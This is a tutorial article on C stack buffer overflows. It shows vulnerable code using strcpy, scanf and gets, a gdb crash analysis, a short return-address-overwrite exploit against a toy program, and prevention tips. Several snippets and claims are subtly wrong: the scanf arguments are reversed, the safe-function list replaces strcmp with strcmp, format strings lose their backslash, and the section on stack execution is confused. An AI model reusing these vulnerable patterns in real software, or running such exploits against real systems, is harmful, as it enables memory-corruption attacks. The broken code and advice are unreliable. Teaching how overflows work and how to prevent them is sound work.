A buffer overflow occurs when a program or process tries to store more data in a temporary data storage area than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information can overflow into adjacent buffers, corrupting or overwriting the valid data held in them.

By: Suhas Desai

Buffer overflows are a fertile source of bugs and malicious attacks. They occur when a program attempts to write data past the end of a buffer. A buffer is a contiguous allocated chunk of memory, such as an array or pointer in C. Limitation of C and C++ is there are no automatic bounds checking on the buffer where user can write past a buffer as given in example.

Note: All examples are compiled on Linux platform having x86 configuration.

  int main () 
  {
  int buffer [10];
  buffer[20]=10;
  }

After execution of this program it won’t give errors but program attempts to write beyond the allocated memory for the buffer which results for unexpected output.

Example:

	void function (char *str) 
	{
		char buffer[16];
		strcpy(buffer,str);
	}
	
int main()
	{
	char *str=”I am greater than 16 bytes”;
	function(str);
	}
 

This program is guaranteed to cause unexpected behavior, because a string (str) of 27 bytes has been copied to a location (buffer) that has been allocated for only 16 bytes. The extra bytes run past the buffer and overwrite the space allocated for the FP, return address and so on. This corrupts the process stack. The function used to copy the string is strcpy, which completes no checking of bounds. Using strncpy would have prevented this corruption of the stack.

Example:

int main()
	{
	char buff[15]={0};
	printf(“Enter your name:”);
	scanf(buff,”%s”);
	}

In this example, program reads a string from the standard input but does not check strings length. If the string has more than 14 characters, then it causes a buffer overflow as scanf() tries to write the remaining character past buff’s end.

Note: One character is always reserved for a null terminator.

The result is most likely a segmentation fault that crashes the program .In certain conditions, the users will receive a shell’s prompt after the crash. Even if the shell has restricted privileges, they can examine the values of environment variables; list the current directory files to detect the network with the pig command.

Writing Buffer Overflow exploits:

1. Example of an exploitable program - Lets assume that we exploit a function like this:

void lame (void) 
{ 
char small[30]; 
gets (small); 
printf("%sn", small);
}
main() 
{ 
lame (); 
return 0; 
}

Compile and disassemble it:

# cc -ggdb program.c -o program
/tmp/cca017401.o: In function `lame':


/root/program.c:1: the `gets' function is 
         dangerous and should not be used.

# gdb program


/* short explanation: gdb, the GNU debugger 
   is used here to read the
   binary file and disassemble it (translate 
   bytes to assembler code) */


(gdb) disas main
Dump of assembler code for function main:
0x80484c8 :     pushl  %ebp
0x80484c9 :     movl   %esp,%ebp
0x80484cb :     call     0x80484a0 
0x80484d0 :     leave
0x80484d1 :     ret


(gdb) disas lame
Dump of assembler code for function lame:


/* saving the frame pointer onto the stack 
   right before the ret address */


0x80484a0 :     pushl  %ebp
0x80484a1 :     movl   %esp,%ebp


/* enlarge the stack by 0x20 or 32. our buffer 
   is 30 characters, but the memory is allocated 
   4byte-wise (because the processor uses 32bit 
   words) this is the equivalent to: char small[30]; */
0x80484a3 :     subl   $0x20,%esp


/* load a pointer to small[30] (the space on 
   the stack, which is located at virtual 
   address 0xffffffe0(%ebp)) on the stack, and 
   call the gets function: gets(small); */


0x80484a6 :    leal      0xffffffe0(%ebp),%eax
0x80484a9 :    pushl   %eax
0x80484aa :    call      0x80483ec 
0x80484af :    addl     $0x4,%esp


/* load the address of small and the address of "%sn" 
   string on stack and call the print function: 
   printf("%sn", small); */

0x80484b2 :    leal   0xffffffe0(%ebp),%eax
0x80484b5 :    pushl  %eax
0x80484b6 :    pushl  $0x804852c
0x80484bb :    call   0x80483dc 
0x80484c0 :    addl   $0x8,%esp

/* get the return address, 0x80484d0, from stack 
  and return to that address. you don't see that 
  explicitly here because it is done by the CPU 
  as 'ret' */

0x80484c3 :    leave
0x80484c4 :    ret

End of assembler dump.

1.a. Overflowing the program

# ./program xxxxxxxxx <- user input xxxxxxxxxxxxx 
# ./program xxxxxxxxx <- user input xxxxxxxxxxxxx 

Segmentation fault (core dumped) # gdb program 
core (gdb) info registers eax: 0x24 36 ecx: 0x804852f 
134513967 edx: 0x1 1 ebx: 0x11a3c8 1156040 esp: 
0xbffffdb8 -1073742408 ebp: 0x787878 7895160 

EBP is 0x787878, this means that we have written more data on the stack than the input buffer could handle. 0x78 is the hex representation of 'x'. The process had a buffer of 32 bytes maximum size. We have written more data into memory than allocated for user input and therefore overwritten EBP and the return address with 'xxxx', and the process tried to resume execution at address 0x787878, which caused it to get a segmentation fault.

1.b. Changing the return address

Lets try to exploit the program to return to lame() instead of return. We have to change return address 0x80484d0 to 0x80484cb, that is all. In memory, we have: 32 bytes buffer space | 4 bytes saved EBP | 4 bytes RET. Here is a simple program to put the 4byte return address into a 1byte character buffer:

main()
{
int i=0; 
char buf[44];
for (i=0;i<=40;i+=4)
*(long *) &buf[i] = 0x80484cb;
puts(buf);
}

# ./program
test		 <- user input
test

Here the program went through the function two times. If an overflow is present, the return address of functions can be changed to alter the programs execution thread.

Prevention:

1. Always check the bounds of an array before writing it to a buffer. If this is possible [eg when the input is coming from CGI script], then use functions that the number of input characters. For instance, instead of using scanf (), use the fgets () function which reads characters upto specified limit.

Example:

	int main()
	{
	char buff[15]={0};
	fgets(buff,sizeof(buff),stdin); 
    //reads at most 14 characters
	}
2. Additionaly, the standard string functions have versions that take on explicit size limit. Thus ,instead of strcpy(),strcmp() and sprintf() use strncpy(),strcmp(),snprint() respectively.

3. Stack execute invalidation:

Any code that attempts to execute any other code residing in the stack will cause a segmentation violation. Solution is not easy to solve this segmentation violation. Although it is possible in Linux, few compliers use trampoline functions to implement taking the address of a nested function that works on the system stack being executable. A trampoline is a small piece of code created at a run-time when the address of a nested function is taken. It normally resides in the stack, in the stack frame of the containing function and thus requires the stack to be executable.

4. Dynamic run-time checks:

This method primarily relies on the safety code being preloaded before an application is executed. This preloaded component can either provide safer versions of the standard unsafe functions, or it can ensure that return addresses are not overwritten. libsafe library provides secure calls to these functions, even if the function is not available. It makes use of the fact that stack frames are linked together by frame pointers. When a buffer is passed as an argument to any of the unsafe functions, libsafe follows the frame pointers to the correct stack frame. It then checks the distance to the nearest return address, and when the function executes, it makes sure that address is not overwritten.

Bibliography:


Suhas A Desai is an undergraduate Computer Engineering Student at Walchand CE Sangli, MS, India. He has written the following: "Biometrics Security with Smart Card in Linux" which was published in ISA EXPO 2004, IEEE Real-Time and Embedded Technology and Applications Symposium, CA, USA., InTech Journal,TX,USA., and e-SMART 2005,France. His research area include Linux security, networking,and Linux kernel internals.